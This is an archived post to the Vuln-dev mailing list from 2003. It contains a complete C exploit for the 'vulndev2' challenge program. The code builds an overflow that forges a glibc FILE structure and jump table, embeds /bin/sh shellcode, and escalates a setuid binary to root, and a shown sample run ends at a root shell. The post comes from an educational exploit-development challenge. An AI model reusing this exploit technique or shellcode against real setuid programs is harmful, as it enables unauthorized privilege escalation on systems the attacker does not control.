Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: "D." <dugely () yahoo com>
Date: Sat, 24 May 2003 04:59:35 -0700 (PDT)
Hello vuln-dev!

Attached is an exploit for vulndev2.c, or you can download it here:
http://www.hcsw.org/sploits/vulndev2sploit.c

This was a fun challenge and I hope there are lots of interesting posts about it as well as many more interesting challenges in the future!

Doug Hoyte
Hypervivid Solutions, Inc
/*
 vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc
 www.hypervivid.com  www.hcsw.org  fractal@efnet

 doug@saturn:~/devel/vulndev$ uname -mnrsp
 Linux saturn 2.4.19 i686 unknown
 doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c
 doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c
 doug@saturn:~/devel/vulndev$ su
 Password:
 root@saturn:/home/doug/devel/vulndev# chown root vulndev2
 root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2
 root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2
 root@saturn:/home/doug/devel/vulndev# exit
 doug@saturn:~/devel/vulndev$ ls -al vulndev2
 -rwsr-sr-x    1 root     root        18373 May 24 04:16 vulndev2
 doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c

 [*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com

 [*] Using offset bffff86c

 [*] Removing old log file 'db.log'

 [*] Sploiting...

 ;;Ìøÿ¿;;
 sh-2.05a# whoami
 root
 sh-2.05a# exit
 doug@saturn:~/devel/vulndev$
*/

#include <unistd.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>   /* memset/memcpy; added here, missing from the posted include list */

/* my strtok's, well... don't ask */
int my_hatoi(char *tp) {
  int t=0;
  char tc;

  /* Skip an optional "0x" prefix, then accumulate hex digits */
  if (tp[0]=='0' && tp[1]=='x') tp+=2;

  while(isxdigit(tc = tolower(*tp))) {
    if (isdigit(tc)) t = (t<<4) + (tc - '0');
    else t = (t<<4) + (tc - 'a' + 10);
    tp++;
  }

  return t;
}

int main (int argc, char *argv[]) {
  // shellcode for Linux/x86 by Aleph Null
  char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  char sploit1[2000];
  char sploit2[100];
  int i, ADDR_OF_BUF, *tp;

  printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n");

  if (argc != 3) {
    printf("  Usage: %s <path to vulndev2> <offset>\n", argv[0]);
    printf("  Offset should be the location in memory of the 'buf' variable\n\n");
    return 0;
  }

  ADDR_OF_BUF = my_hatoi(argv[2]);
  printf("[*] Using offset %x\n\n", ADDR_OF_BUF);

  /* Remove the old log file */
  printf("[*] Removing old log file 'db.log'\n\n");
  unlink("db.log");

  // Everything to 'a's
  memset(sploit1, 'a', sizeof(sploit1));

  // Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way)
  *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2;

  // The magic number for FILE structs on glibc is 0xfBAD! Dig?
  tp = (int*) (sploit1+96);
  tp[0] = 0xFBAD0101;

  // The FILE struct BS, we don't really care: we just want the ...
  for(i=1;i<40;i++)
    tp[i] = (int) (ADDR_OF_BUF+96+(40*4));

  // ... jump table
  for(i=40;i<48;i++)
    tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4));

  // Tag the shell code on at the end
  memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode));

  // Use arg #2 to point F1 to our FILE struct
  memset(sploit2, '\0', sizeof(sploit2));
  *((int*)sploit2) = ADDR_OF_BUF+96;

  // There's a bad moon on the rise...
  printf("[*] Sploiting...\n\n");
  execl(argv[1], argv[1], sploit1, sploit2, NULL);

  return 0;
}